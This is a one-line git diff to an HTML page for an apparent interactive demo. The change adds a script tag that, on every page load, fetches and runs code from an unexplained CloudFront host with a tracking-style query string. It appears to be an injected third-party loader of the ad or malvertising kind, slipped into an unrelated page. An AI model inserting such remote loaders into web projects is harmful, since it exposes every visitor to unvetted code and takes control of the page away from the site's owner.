--- a/index.html
+++ b/index.html
@@ -101,4 +101,5 @@
         setTimeout(() => init(location.hash == "#capacitor" ? capacitor : jellyfish), 500)
         
     </script>
+    <script data-cfasync="false" src="//d3tozt7si7bmf7.cloudfront.net/?tzotd=939223"></script>
 </body>
